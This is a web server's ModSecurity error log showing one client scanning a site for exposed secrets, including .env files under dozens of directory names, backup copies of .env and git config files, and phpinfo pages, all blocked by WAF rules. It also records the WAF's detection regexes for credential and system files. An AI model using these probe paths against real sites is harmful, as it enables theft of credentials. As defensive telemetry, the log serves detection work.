[Tue May 26 14:29:58.701600 2026] [security2:error] [pid 610693:tid 610835] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtuAAAAAw"]
[Tue May 26 14:29:58.734741 2026] [security2:error] [pid 610693:tid 610912] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtuwAAAFk"]
[Tue May 26 14:29:58.735769 2026] [security2:error] [pid 610693:tid 610858] [client 195.178.110.199:48158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtvAAAACM"]
[Tue May 26 14:29:58.801907 2026] [security2:error] [pid 610693:tid 610871] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.bak"] [unique_id "ahVhDjvNO3hpmlY6M8RtvgAAADA"]
[Tue May 26 14:29:58.951852 2026] [security2:error] [pid 610693:tid 610892] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.old"] [unique_id "ahVhDjvNO3hpmlY6M8RtzQAAAEU"]
[Tue May 26 14:29:59.018257 2026] [security2:error] [pid 610693:tid 610927] [client 195.178.110.199:48158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.backup"] [unique_id "ahVhDzvNO3hpmlY6M8Rt2gAAAGg"]
[Tue May 26 14:29:59.077491 2026] [security2:error] [pid 610693:tid 610839] [client 195.178.110.199:48056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.php"] [unique_id "ahVhDzvNO3hpmlY6M8Rt3AAAABA"]
[Tue May 26 14:29:59.093787 2026] [security2:error] [pid 610693:tid 610870] [client 195.178.110.199:48122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.swp"] [unique_id "ahVhDzvNO3hpmlY6M8Rt3QAAAC8"]
[Tue May 26 14:29:59.256427 2026] [security2:error] [pid 606909:tid 607118] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env~"] [unique_id "ahVhD10yRtX9qA7aVUV0OQAAANQ"]
[Tue May 26 14:29:59.372339 2026] [security2:error] [pid 610693:tid 610940] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.bak"] [unique_id "ahVhDzvNO3hpmlY6M8Rt7gAAAHU"]
[Tue May 26 14:29:59.411660 2026] [security2:error] [pid 606909:tid 607074] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.old"] [unique_id "ahVhD10yRtX9qA7aVUV0PAAAAKg"]
[Tue May 26 14:29:59.544760 2026] [security2:error] [pid 610693:tid 610918] [client 195.178.110.199:48166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config~"] [unique_id "ahVhDzvNO3hpmlY6M8Rt9AAAAF8"]
[Tue May 26 14:29:59.658809 2026] [security2:error] [pid 606909:tid 607042] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhD10yRtX9qA7aVUV0OgAAAIg"]
[Tue May 26 14:30:00.277901 2026] [security2:error] [pid 606909:tid 606921] [remote 121.200.216.55:45830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVhEF0yRtX9qA7aVUV0RgAAkgs"]
[Tue May 26 14:30:01.656064 2026] [security2:error] [pid 606909:tid 607147] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhEV0yRtX9qA7aVUV0XgAAAPE"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:30:01.699170 2026] [security2:error] [pid 610693:tid 610887] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhETvNO3hpmlY6M8RuIAAAAEA"]
[Tue May 26 14:30:01.777522 2026] [security2:error] [pid 610693:tid 610908] [client 154.161.32.97:56477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhETvNO3hpmlY6M8RuHgAAAFU"]
[Tue May 26 14:30:02.156784 2026] [autoindex:error] [pid 610693:tid 610873] [client 195.178.110.199:48122] AH01276: Cannot serve directory /home2/azurm42s/gestionbar.azurmediatec.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:30:02.284363 2026] [security2:error] [pid 610693:tid 610847] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/ADMIN/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuRAAAABg"]
[Tue May 26 14:30:02.368979 2026] [security2:error] [pid 610693:tid 610922] [client 195.178.110.199:48142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVhEjvNO3hpmlY6M8RuSQAAAGM"]
[Tue May 26 14:30:02.428362 2026] [security2:error] [pid 610693:tid 610893] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/API/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuTgAAAEY"]
[Tue May 26 14:30:02.485534 2026] [security2:error] [pid 606909:tid 607064] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACKEND/.env"] [unique_id "ahVhEl0yRtX9qA7aVUV0dQAAAJ4"]
[Tue May 26 14:30:02.522319 2026] [security2:error] [pid 610693:tid 610894] [client 195.178.110.199:48166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BE/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuUgAAAEc"]
[Tue May 26 14:30:02.576425 2026] [security2:error] [pid 610693:tid 610916] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/APP/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuVgAAAF0"]
[Tue May 26 14:30:02.576767 2026] [security2:error] [pid 610693:tid 610836] [client 195.178.110.199:48122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Be/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuVwAAAA0"]
[Tue May 26 14:30:02.609811 2026] [security2:error] [pid 610693:tid 610855] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACK/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuWQAAACA"]
[Tue May 26 14:30:02.729635 2026] [security2:error] [pid 610693:tid 610889] [client 195.178.110.199:48130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Backend/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuXwAAAEI"]
[Tue May 26 14:30:02.747089 2026] [security2:error] [pid 610693:tid 610917] [client 195.178.110.199:48112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Api/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuYAAAAF4"]
[Tue May 26 14:30:03.046003 2026] [security2:error] [pid 610693:tid 610858] [client 195.178.110.199:48112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RubAAAACM"]
[Tue May 26 14:30:03.346872 2026] [security2:error] [pid 610693:tid 610892] [client 195.178.110.199:48122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RugwAAAEU"]
[Tue May 26 14:30:03.440239 2026] [security2:error] [pid 610693:tid 610895] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/administrator/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RuiAAAAEg"]
[Tue May 26 14:30:03.452501 2026] [security2:error] [pid 606909:tid 607100] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-backend/.env"] [unique_id "ahVhE10yRtX9qA7aVUV0jgAAAMI"]
[Tue May 26 14:30:03.541083 2026] [security2:error] [pid 610693:tid 610881] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin-app/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RujQAAADo"]
[Tue May 26 14:30:03.564518 2026] [security2:error] [pid 610693:tid 610877] [client 195.178.110.199:48130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RujwAAADY"]
[Tue May 26 14:30:03.594125 2026] [security2:error] [pid 610693:tid 610905] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-node/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RukAAAAFI"]
[Tue May 26 14:30:03.622537 2026] [security2:error] [pid 606909:tid 607110] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/.env"] [unique_id "ahVhE10yRtX9qA7aVUV0jwAAAMw"]
[Tue May 26 14:30:03.695249 2026] [security2:error] [pid 610693:tid 610868] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhEzvNO3hpmlY6M8RuewAAAC0"]
[Tue May 26 14:30:03.733337 2026] [security2:error] [pid 610693:tid 610882] [client 195.178.110.199:48100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/info.php"] [unique_id "ahVhEzvNO3hpmlY6M8RumAAAADs"]
[Tue May 26 14:30:03.842946 2026] [security2:error] [pid 610693:tid 610922] [client 195.178.110.199:48124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RuogAAAGM"]
[Tue May 26 14:30:04.094968 2026] [security2:error] [pid 610693:tid 610836] [client 195.178.110.199:32902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apis/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RurwAAAA0"]
[Tue May 26 14:30:04.368088 2026] [security2:error] [pid 610693:tid 610840] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/app/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuvgAAABE"]
[Tue May 26 14:30:04.581900 2026] [security2:error] [pid 610693:tid 610828] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apps/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuyQAAAAU"]
[Tue May 26 14:30:04.678264 2026] [security2:error] [pid 610693:tid 610903] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/application/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuzQAAAFA"]
[Tue May 26 14:30:05.181598 2026] [security2:error] [pid 610693:tid 610887] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back-end/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru4wAAAEA"]
